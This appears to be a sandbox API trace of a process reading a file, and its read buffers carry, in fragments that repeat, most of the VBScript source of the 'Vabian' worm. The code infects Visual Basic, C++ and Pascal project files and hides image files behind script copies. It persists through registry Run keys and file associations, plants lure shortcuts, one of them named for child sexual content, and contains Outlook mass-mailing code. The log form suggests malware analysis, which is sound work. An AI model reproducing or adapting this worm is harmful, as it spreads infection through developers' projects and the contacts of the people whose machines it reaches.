If fso.GetExtensionName(file.path)="cpp" then
on error resume next
set readcppmarker = fso.OpenTextFile( FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,503 | 252 | NtReadFile |
Buffer => file.path,1, True)
cppmarker = readcppmarker.readline
cppreadall = readcppmarker.readall
if mid(cppreadall,len(cppreadall FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,503 | 252 | NtReadFile |
Buffer => ),1) = "}" then
cppreadall1 = replace(cppreadall,mid(cppreadall,len(cppreadall),1),"")
end if
if cppmarker <> "// W3 FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,503 | 252 | NtReadFile |
Buffer => 2.hllp.Vabian" then
set readcppmarker = fso.CreateTextFile(file.path, True)
readcppmarker.write "// W32.hllp.Vabian" & v FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,503 | 252 | NtReadFile |
Buffer => bcrlf & "FILE *Vabian;" & vbcrlf
readcppmarker.write cppreadall & "wormvabian = fopen("&chr(34)&"vabian.vbs"&chr(34)&","&chr FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,503 | 252 | NtReadFile |
Buffer => (34)&"wt"&chr(34)&");" & vbcrlf
readcppmarker.write "if(wormvabian)"&vbcrlf&"{"& allsourcecpp &vbcrlf&"}" & vbcrlf
readc FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,503 | 252 | NtReadFile |
Buffer => ppmarker.write "ShellExecute(NULL, "&chr(34)&"open"&chr(34)&", "&chr(34)&"vabian.vbs"&chr(34)&", NULL, NULL, SW_SHOWNORMAL);" & FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,503 | 252 | NtReadFile |
Buffer => vbcrlf
readcppmarker.write "}" & vbcrlf
readcppmarker.close
end if
end if
If fso.GetExtensionName(file.path)= FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,503 | 252 | NtReadFile |
Buffer => "pas" then
on error resume next
set readpasmarker = fso.OpenTextFile(file.path,1, True)
pasmarker = readpasmarker.readline FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,503 | 252 | NtReadFile |
Buffer =>
pasreadall = readpasmarker.readall
if pasmarker <> "{ W32.hllp.Vabian }" then
set readpasmarker = fso.CreateTextFile(f FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,503 | 252 | NtReadFile |
Buffer => ile.path, True)
readpasmarker.write "{ W32.hllp.Vabian }" & vbcrlf & pasreadall & vbcrlf
readpasmarker.write "procedure FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,503 | 252 | NtReadFile |
Buffer => " & "TForm1.FormClose(Sender: TObject; var Action: TCloseAction);" & vbcrlf
readpasmarker.write "begin" & vbcrlf & "AssignFi FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,503 | 252 | NtReadFile |
Buffer => le (Vabian,'C:\Windows\STARTM~1\programs\startup\Vabian.vbs');" & vbcrlf
readpasmarker.write "Rewrite (Vabian);" & vbcrlf & FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,503 | 252 | NtReadFile |
Buffer => allsourcepas & vbcrlf & "CloseFile(Vabian);" & vbcrlf
readpasmarker.close
end if
end if
If fso.GetExtensionName(fil FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,503 | 252 | NtReadFile |
Buffer => e.path)="bmp" or fso.GetExtensionName(file.path)="jpg" or fso.GetExtensionName(file.path)="gif" or fso.GetExtensionName(file.pat FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,503 | 252 | NtReadFile |
Buffer => h)="ico" then
For i = 1 To 8
fvar = Chr(Int(22 * Rnd) + 97)
varall = fvar & varall
Next
on error resume next
FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,503 | 252 | NtReadFile |
Buffer => bathelp = file.path & ".bat"
Set dropper = Fso.Createtextfile(bathelp, True)
dropper.writeline "Attrib +h " & file.path
FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,503 | 252 | NtReadFile |
Buffer =>
dropper.Close
executor.run bathelp
fso.Deletefile bathelp
vbscopy = file.path & ".VX"
Set dropper2 = Fso.Createte FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,503 | 252 | NtReadFile |
Buffer => xtfile(vbscopy, True)
dropper2.write "Set " & varall & " = wscript.CreateObject(" & chr(34) & "WScript.Shell" & chr(34) & ")" FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,503 | 252 | NtReadFile |
Buffer => & vbcrlf & "Sucke.run " & chr(34) & file.path & chr(34) & vbcrlf
dropper2.write scr
dropper2.Close
end if
next
Se FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,503 | 252 | NtReadFile |
Buffer => t Subfolders = folder.SubFolders
For Each Subfolder in Subfolders
FindVictim Subfolder.path
Next
end function
Set FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,503 | 252 | NtReadFile |
Buffer => spreader =CreateObject("Outlook.Application")
Set spreader =spreader.GetNameSpace("MAPI")
For Each C In spreader.AddressLists
FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,503 | 252 | NtReadFile |
Buffer =>
If C.AddressEntries.Count <> 0 Then
For D=1 To C.AddressEntries.Count
Set spreader=C.AddressEntries(D)
Set spreader=spreader FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,503 | 252 | NtReadFile |
Buffer => .CreateItem(0)
spreader.To=aaaaaaaa.Address
spreader.Subject="Vabian Milenium"
spreader.Body="Stop asking,just checkout the a FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,503 | 252 | NtFreeVirtualMemory |
FreeType => 0x00004000 ProcessHandle => 0xffffffff RegionSize => 0x00004000 BaseAddress => 0x001ca000 |
SUCCESS | 0x00000000 | |
| 19:40:26,503 | 252 | NtReadFile |
Buffer => ttachment"
spreader.Attachments.Add(Fso.GetSpecialFolder(0)&"\Vabian.vbs")
spreader.DeleteAfterSubmit=True
'//If spreader.To FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,503 | 252 | NtReadFile |
Buffer => <> "" Then
'//spreader.Send
'//End If
Next
End If
Next
'VabianMarker FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,503 | 252 | NtReadFile |
Buffer => FileHandle => 0x0000020c |
FAILURE | 0xc0000011 | |
| 19:40:26,503 | 252 | NtCreateFile |
ShareAccess => 3 FileName => C:\windows\backup_vabian.sys DesiredAccess => 0x80100080 CreateDisposition => 1 FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,503 | 252 | NtReadFile |
Buffer => Rem VBS.W32.I-worm.Vabian
Rem Script Project Infector [pas,frm,cpp]
Rem By Psychologic aka Puppy
Rem Mailto : Psychologic@hot FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,503 | 252 | NtReadFile |
Buffer => mail.com
'sending filename
'x=msgbox(Wscript.ScriptName, 0, "Title")
'malware expires....
date2 = #06/01/2018#
date1 = FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,503 | 252 | NtReadFile |
Buffer => Date 'get current date
'x = msgBox(date1,0,"sadd")
'x1 = msgBox(date2,0,"sad1")
'x2 = msgBox(diff,0,"diff")
Do while FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,503 | 252 | NtReadFile |
Buffer => true
If date1 < date2 Then
Exit Do
End If
WScript.Sleep 1000
Loop
On error resume next
Set executor = wscript.Cr FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,503 | 252 | NtReadFile |
Buffer => eateObject("WScript.Shell")
Set fso = CreateObject("scripting.FileSystemObject")
Set drop = Fso.opentextfile(wscript.scriptful FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,503 | 252 | NtReadFile |
Buffer => lname, 1)
src = drop.readall
drop.close
executor.regwrite "HKEY_CLASSES_ROOT\VXFile\"
executor.regwrite "HKEY_CLASSES_ROOT FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,503 | 252 | NtReadFile |
Buffer => \VXFile\DefaultIcon\","C:\PROGRA~1\INTERN~1\iexplore.exe,8"
executor.regwrite "HKEY_CLASSES_ROOT\VXFile\ScriptEngine\","VBScrip FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,503 | 252 | NtReadFile |
Buffer => t"
executor.regwrite "HKEY_CLASSES_ROOT\VXFile\ScriptHostEncode\","{85131631-480C-11D2-B1F9-00C04F86C324}"
executor.regwrite " FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,503 | 252 | NtReadFile |
Buffer => HKEY_CLASSES_ROOT\VXFile\Shell\Open\Command\","C:\WINDOWS\WScript.exe " & chr(34) & "%1" & chr(34) & " %*"
executor.regwrite "H FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,503 | 252 | NtReadFile |
Buffer => KEY_CLASSES_ROOT\VXFile\Shell\Play\Command\","C:\WINDOWS\COMMAND\CScript.exe " & chr(34) & "%1" & chr(34) & " %*"
executor.regw FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,503 | 252 | NtReadFile |
Buffer => rite "HKEY_CLASSES_ROOT\VXFile\ShellEx\PropertySheetHandlers\WSHProps\","{60254CA5-953B-11CF-8C96-00AA00B8708C}"
executor.regwr FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,503 | 252 | NtReadFile |
Buffer => ite "HKEY_CLASSES_ROOT\.VX\","VXFile"
executor.regwrite "HKEY_CLASSES_ROOT\VX\CLSID\","{B54F3741-5B07-11cf-A4B0-00AA004A55E8}"
FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,503 | 252 | NtReadFile |
Buffer =>
executor.regwrite "HKEY_CLASSES_ROOT\VX\OLEScript\"
fso.copyfile wscript.scriptfullname,"C:\windows\backup_vabian.sys"
fso. FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,503 | 252 | NtReadFile |
Buffer => copyfile wscript.scriptfullname,"C:\windows\Vabian.VX"
if fso.FolderExists("C:\Documents and Settings\All Users\Desktop") the FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,503 | 252 | NtReadFile |
Buffer => n
on error resume next
set shell=wscript.createobject("wscript.shell")
set msc=shell.CreateShortCut("C:\Documents and Sett FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,503 | 252 | NtReadFile |
Buffer => ings\All Users\Desktop\Sex-Vabian.jpg.lnk")
msc.TargetPath = Shell.ExpandEnvironmentStrings("%windir%\Vabian.VX")
msc.IconLo FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,503 | 252 | NtReadFile |
Buffer => cation = Shell.ExpandEnvironmentStrings("C:\windows\system32\mspaint.exe, 0")
msc.WindowStyle = 4
msc.Save
end if
if fso FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,503 | 252 | NtReadFile |
Buffer => .FolderExists("C:\windows\Desktop") then
on error resume next
set shell=wscript.createobject("wscript.shell")
set msc=shel FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,503 | 252 | NtReadFile |
Buffer => l.CreateShortCut("C:\windows\Desktop\Sex-Children.jpg.lnk")
msc.TargetPath = Shell.ExpandEnvironmentStrings("%windir%\Vabian.V FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,503 | 252 | NtReadFile |
Buffer => X")
msc.WindowStyle = 4
msc.Save
end if
set opendroperfrm = fso.OpenTextFile("C:\windows\backup_vabian.sys", 1)
allsour FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,503 | 252 | NtReadFile |
Buffer => cefrm = ""
oneline = ""
do while opendroperfrm.readline <> "'VabianMarker"
oneline = opendroperfrm.readline
frmformat = FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,503 | 252 | NtReadFile |
Buffer => replace(oneline,chr(34),chr(34)&"&chr(34)&"&chr(34))
fullline = "? #1," & frmformat
allsourcefrm = allsourcefrm & vbcrlf & FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,503 | 252 | NtReadFile |
Buffer => fullline
loop
opendroperfrm.close
set opendropercpp = fso.OpenTextFile("C:\windows\backup_vabian.sys", 1)
allsourcecpp = FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,503 | 252 | NtReadFile |
Buffer => ""
oneline1 = ""
do while opendropercpp.readline <> "'VabianMarker"
oneline1 = ""
oneline1 = opendropercpp.readline
oneb FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,503 | 252 | NtReadFile |
Buffer => yone = len(oneline1)
for i = 1 to onebyone
read34 = mid(oneline1,i,1)
if read34 = chr(34) then
m = ",34"
else
FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,503 | 252 | NtReadFile |
Buffer => m = ""
end if
all = all & m
next
cppformat1 = replace(oneline1,chr(34),"%c")
cppformat = replace(cppformat1,"\","\\" FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,503 | 252 | NtReadFile |
Buffer => )
fullline1 = "fprintf(mvbswe," & chr(34) & cppformat & "\n" & chr(34) & all & ");"
allsourcecpp = allsourcecpp & vbcrlf & FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,503 | 252 | NtReadFile |
Buffer => fullline1
all = ""
loop
opendropercpp.close
set opendroperpas = fso.OpenTextFile("C:\windows\backup_vabian.sys", 1)
all FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,503 | 252 | NtReadFile |
Buffer => sourcepas = ""
oneline2 = ""
do while opendroperpas.readline <> "'VabianMarker"
oneline2 = ""
oneline2 = opendroperpas.rea FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,503 | 252 | NtReadFile |
Buffer => dline
fullline2 = "writeln (mvbswe,'" & oneline2 & "');"
allsourcepas = allsourcepas & vbcrlf & fullline2
loop
opendroper FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,503 | 252 | NtReadFile |
Buffer => pas.close
winfold = fso.getspecialfolder(0)
backpath = winfold & "\vabian.vbs"
executor.regwrite "HKLM\SOFTWARE\Microsoft FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,503 | 252 | NtReadFile |
Buffer => \Windows\CurrentVersion\Run\Vabian", "wscript.exe " & backpath & " %"
fso.copyfile wscript.scriptfullname, backpath
ranpay = i FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,503 | 252 | NtReadFile |
Buffer => nt(rnd * 9)+1
if ranpay > 5 then
set payload = fso.CreateTextFile("C:\payload.txt")
payload.write "VBS.Vabian" & vbcrlf & FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,503 | 252 | NtReadFile |
Buffer => "-------------" & vbcrlf
payload.write "Dear user ... " & vbcrlf & "I just want to tell you something" & vbcrlf
payload.wri FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,503 | 252 | NtReadFile |
Buffer => te "Your computer has been infected with virus,it called VBS.Vabian" & vbcrlf
payload.write "If you are an Programer, go look FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,503 | 252 | NtReadFile |
Buffer => at your project check all your frm or cpp or pas files" & vbcrlf
payload.write "Cos that is the victim" & vbcrlf & "Ok I have FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,503 | 252 | NtReadFile |
Buffer => to go now" & vbcrlf
payload.write "--------------------------------------------------" & vbcrlf
payload.write "Made by Psyc FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,503 | 252 | NtReadFile |
Buffer => hologic aka Puppy - Indonesian hip-hop singer"
payload.close
executor.run "C:\payload.txt"
end if
Set Drives=fso.drives FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,503 | 252 | NtReadFile |
Buffer =>
For Each Drive in Drives
If drive.isready then
FindVictim drive
end If
Next
function FindVictim(path)
on error FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,503 | 252 | NtReadFile |
Buffer => resume next
Set Folder=fso.getfolder(path)
Set Files = folder.files
For Each File in files
If fso.GetExtensionName(file FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,503 | 252 | NtReadFile |
Buffer => .path)="frm" then
on error resume next
set readfrmmarker = fso.OpenTextFile(file.path,1, True)
frmmarker = readfrmmarker.r FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,503 | 252 | NtReadFile |
Buffer => eadline
frmreadall = readfrmmarker.readall
if frmmarker <> "Rem W32.hllp.Vabian" then
set readfrmmarker = fso.CreateTex FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,503 | 252 | NtReadFile |
Buffer => tFile(file.path, True)
readfrmmarker.write "Rem W32.hllp.Vabian" & vbcrlf & frmreadall & vbcrlf
readfrmmarker.write "Pri FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,503 | 252 | NtReadFile |
Buffer => vate Sub form_unload(cancel As Integer)" & vbcrlf
readfrmmarker.write "On Error GoTo err:" & vbcrlf
readfrmmarker.write FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,503 | 252 | NtReadFile |
Buffer => "Open " & chr(34) & "C:\vabian.vbs" & chr(34) & " for output as #1" & vbcrlf
readfrmmarker.write allsourcefrm & vbcrlf & "c FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,503 | 252 | NtReadFile |
Buffer => lose #1" & vbcrlf & "shell " & chr(34) & "C:\vabian.vbs" & chr(34) & vbcrlf
readfrmmarker.write "msgbox " & chr(34) & "Your FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,503 | 252 | NtReadFile |
Buffer => Program has been infected by Vabian virus Created by Psychologic" & chr(34) & ",VbInformation," & chr(34) & "W32.VBS.Vabian" & c FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,503 | 252 | NtReadFile |
Buffer => hr(34)
readfrmmarker.write vbcrlf & "exit sub" & vbcrlf & "err:" & vbcrlf & "End sub" & vbcrlf
readfrmmarker.close
en FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,503 | 252 | NtReadFile |
Buffer => d if
end if
If fso.GetExtensionName(file.path)="cpp" then
on error resume next
set readcppmarker = fso.OpenTextFile( FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,503 | 252 | NtReadFile |
Buffer => file.path,1, True)
cppmarker = readcppmarker.readline
cppreadall = readcppmarker.readall
if mid(cppreadall,len(cppreadall FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,503 | 252 | NtReadFile |
Buffer => ),1) = "}" then
cppreadall1 = replace(cppreadall,mid(cppreadall,len(cppreadall),1),"")
end if
if cppmarker <> "// W3 FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,503 | 252 | NtReadFile |
Buffer => 2.hllp.Vabian" then
set readcppmarker = fso.CreateTextFile(file.path, True)
readcppmarker.write "// W32.hllp.Vabian" & v FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,503 | 252 | NtReadFile |
Buffer => bcrlf & "FILE *Vabian;" & vbcrlf
readcppmarker.write cppreadall & "wormvabian = fopen("&chr(34)&"vabian.vbs"&chr(34)&","&chr FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,503 | 252 | NtReadFile |
Buffer => (34)&"wt"&chr(34)&");" & vbcrlf
readcppmarker.write "if(wormvabian)"&vbcrlf&"{"& allsourcecpp &vbcrlf&"}" & vbcrlf
readc FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,503 | 252 | NtReadFile |
Buffer => ppmarker.write "ShellExecute(NULL, "&chr(34)&"open"&chr(34)&", "&chr(34)&"vabian.vbs"&chr(34)&", NULL, NULL, SW_SHOWNORMAL);" & FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,503 | 252 | NtReadFile |
Buffer => vbcrlf
readcppmarker.write "}" & vbcrlf
readcppmarker.close
end if
end if
If fso.GetExtensionName(file.path)= FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,503 | 252 | NtReadFile |
Buffer => "pas" then
on error resume next
set readpasmarker = fso.OpenTextFile(file.path,1, True)
pasmarker = readpasmarker.readline FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,503 | 252 | NtReadFile |
Buffer =>
pasreadall = readpasmarker.readall
if pasmarker <> "{ W32.hllp.Vabian }" then
set readpasmarker = fso.CreateTextFile(f FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,503 | 252 | NtReadFile |
Buffer => ile.path, True)
readpasmarker.write "{ W32.hllp.Vabian }" & vbcrlf & pasreadall & vbcrlf
readpasmarker.write "procedure FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,503 | 252 | NtReadFile |
Buffer => " & "TForm1.FormClose(Sender: TObject; var Action: TCloseAction);" & vbcrlf
readpasmarker.write "begin" & vbcrlf & "AssignFi FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,503 | 252 | NtReadFile |
Buffer => le (Vabian,'C:\Windows\STARTM~1\programs\startup\Vabian.vbs');" & vbcrlf
readpasmarker.write "Rewrite (Vabian);" & vbcrlf & FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,503 | 252 | NtReadFile |
Buffer => allsourcepas & vbcrlf & "CloseFile(Vabian);" & vbcrlf
readpasmarker.close
end if
end if
If fso.GetExtensionName(fil FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,503 | 252 | NtReadFile |
Buffer => e.path)="bmp" or fso.GetExtensionName(file.path)="jpg" or fso.GetExtensionName(file.path)="gif" or fso.GetExtensionName(file.pat FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,503 | 252 | NtReadFile |
Buffer => h)="ico" then
For i = 1 To 8
fvar = Chr(Int(22 * Rnd) + 97)
varall = fvar & varall
Next
on error resume next
FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,513 | 252 | NtFreeVirtualMemory |
FreeType => 0x00004000 ProcessHandle => 0xffffffff RegionSize => 0x00005000 BaseAddress => 0x001be000 |
SUCCESS | 0x00000000 | |
| 19:40:26,513 | 252 | NtReadFile |
Buffer => bathelp = file.path & ".bat"
Set dropper = Fso.Createtextfile(bathelp, True)
dropper.writeline "Attrib +h " & file.path
FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,513 | 252 | NtFreeVirtualMemory |
FreeType => 0x00004000 ProcessHandle => 0xffffffff RegionSize => 0x00002000 BaseAddress => 0x001cf000 |
SUCCESS | 0x00000000 | |
| 19:40:26,513 | 252 | NtReadFile |
Buffer =>
dropper.Close
executor.run bathelp
fso.Deletefile bathelp
vbscopy = file.path & ".VX"
Set dropper2 = Fso.Createte FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,513 | 252 | NtReadFile |
Buffer => xtfile(vbscopy, True)
dropper2.write "Set " & varall & " = wscript.CreateObject(" & chr(34) & "WScript.Shell" & chr(34) & ")" FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,513 | 252 | NtReadFile |
Buffer => & vbcrlf & "Sucke.run " & chr(34) & file.path & chr(34) & vbcrlf
dropper2.write scr
dropper2.Close
end if
next
Se FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,513 | 252 | NtFreeVirtualMemory |
FreeType => 0x00004000 ProcessHandle => 0xffffffff RegionSize => 0x00003000 BaseAddress => 0x001d1000 |
SUCCESS | 0x00000000 | |
| 19:40:26,513 | 252 | NtReadFile |
Buffer => t Subfolders = folder.SubFolders
For Each Subfolder in Subfolders
FindVictim Subfolder.path
Next
end function
Set FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,513 | 252 | NtFreeVirtualMemory |
FreeType => 0x00004000 ProcessHandle => 0xffffffff RegionSize => 0x00006000 BaseAddress => 0x001de000 |
SUCCESS | 0x00000000 | |
| 19:40:26,513 | 252 | NtFreeVirtualMemory |
FreeType => 0x00004000 ProcessHandle => 0xffffffff RegionSize => 0x00006000 BaseAddress => 0x001be000 |
SUCCESS | 0x00000000 | |
| 19:40:26,513 | 252 | NtReadFile |
Buffer => spreader =CreateObject("Outlook.Application")
Set spreader =spreader.GetNameSpace("MAPI")
For Each C In spreader.AddressLists
FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,513 | 252 | NtFreeVirtualMemory |
FreeType => 0x00004000 ProcessHandle => 0xffffffff RegionSize => 0x00002000 BaseAddress => 0x001bb000 |
SUCCESS | 0x00000000 | |
| 19:40:26,513 | 252 | NtReadFile |
Buffer =>
If C.AddressEntries.Count <> 0 Then
For D=1 To C.AddressEntries.Count
Set spreader=C.AddressEntries(D)
Set spreader=spreader FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,513 | 252 | NtFreeVirtualMemory |
FreeType => 0x00004000 ProcessHandle => 0xffffffff RegionSize => 0x00005000 BaseAddress => 0x001d2000 |
SUCCESS | 0x00000000 | |
| 19:40:26,513 | 252 | NtFreeVirtualMemory |
FreeType => 0x00004000 ProcessHandle => 0xffffffff RegionSize => 0x00007000 BaseAddress => 0x001d6000 |
SUCCESS | 0x00000000 | |
| 19:40:26,513 | 252 | NtReadFile |
Buffer => .CreateItem(0)
spreader.To=aaaaaaaa.Address
spreader.Subject="Vabian Milenium"
spreader.Body="Stop asking,just checkout the a FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,513 | 252 | NtFreeVirtualMemory |
FreeType => 0x00004000 ProcessHandle => 0xffffffff RegionSize => 0x00004000 BaseAddress => 0x001e4000 |
SUCCESS | 0x00000000 | |
| 19:40:26,513 | 252 | NtFreeVirtualMemory |
FreeType => 0x00004000 ProcessHandle => 0xffffffff RegionSize => 0x00004000 BaseAddress => 0x001be000 |
SUCCESS | 0x00000000 | |
| 19:40:26,513 | 252 | NtFreeVirtualMemory |
FreeType => 0x00004000 ProcessHandle => 0xffffffff RegionSize => 0x00003000 BaseAddress => 0x001de000 |
SUCCESS | 0x00000000 | |
| 19:40:26,513 | 252 | NtFreeVirtualMemory |
FreeType => 0x00004000 ProcessHandle => 0xffffffff RegionSize => 0x00005000 BaseAddress => 0x001c4000 |
SUCCESS | 0x00000000 | |
| 19:40:26,513 | 252 | NtReadFile |
Buffer => ttachment"
spreader.Attachments.Add(Fso.GetSpecialFolder(0)&"\Vabian.vbs")
spreader.DeleteAfterSubmit=True
'//If spreader.To FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,513 | 252 | NtFreeVirtualMemory |
FreeType => 0x00004000 ProcessHandle => 0xffffffff RegionSize => 0x00003000 BaseAddress => 0x001e8000 |
SUCCESS | 0x00000000 | |
| 19:40:26,513 | 252 | NtFreeVirtualMemory |
FreeType => 0x00004000 ProcessHandle => 0xffffffff RegionSize => 0x00004000 BaseAddress => 0x001ca000 |
SUCCESS | 0x00000000 | |
| 19:40:26,513 | 252 | NtReadFile |
Buffer => <> "" Then
'//spreader.Send
'//End If
Next
End If
Next
'VabianMarker FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,513 | 252 | NtFreeVirtualMemory |
FreeType => 0x00004000 ProcessHandle => 0xffffffff RegionSize => 0x00006000 BaseAddress => 0x001cf000 |
SUCCESS | 0x00000000 | |
| 19:40:26,513 | 252 | NtFreeVirtualMemory |
FreeType => 0x00004000 ProcessHandle => 0xffffffff RegionSize => 0x00005000 BaseAddress => 0x001d5000 |
SUCCESS | 0x00000000 | |
| 19:40:26,513 | 252 | NtFreeVirtualMemory |
FreeType => 0x00004000 ProcessHandle => 0xffffffff RegionSize => 0x00003000 BaseAddress => 0x001be000 |
SUCCESS | 0x00000000 | |
| 19:40:26,513 | 252 | NtFreeVirtualMemory |
FreeType => 0x00004000 ProcessHandle => 0xffffffff RegionSize => 0x00004000 BaseAddress => 0x001e1000 |
SUCCESS | 0x00000000 | |
| 19:40:26,513 | 252 | NtFreeVirtualMemory |
FreeType => 0x00004000 ProcessHandle => 0xffffffff RegionSize => 0x00005000 BaseAddress => 0x001c1000 |
SUCCESS | 0x00000000 | |
| 19:40:26,513 | 252 | NtFreeVirtualMemory |
FreeType => 0x00004000 ProcessHandle => 0xffffffff RegionSize => 0x00004000 BaseAddress => 0x001ca000 |
SUCCESS | 0x00000000 | |
| 19:40:26,513 | 252 | NtReadFile |
Buffer => FileHandle => 0x0000020c |
FAILURE | 0xc0000011 | |
| 19:40:26,513 | 252 | NtCreateFile |
ShareAccess => 3 FileName => C:\windows\backup_vabian.sys DesiredAccess => 0x80100080 CreateDisposition => 1 FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,513 | 252 | NtReadFile |
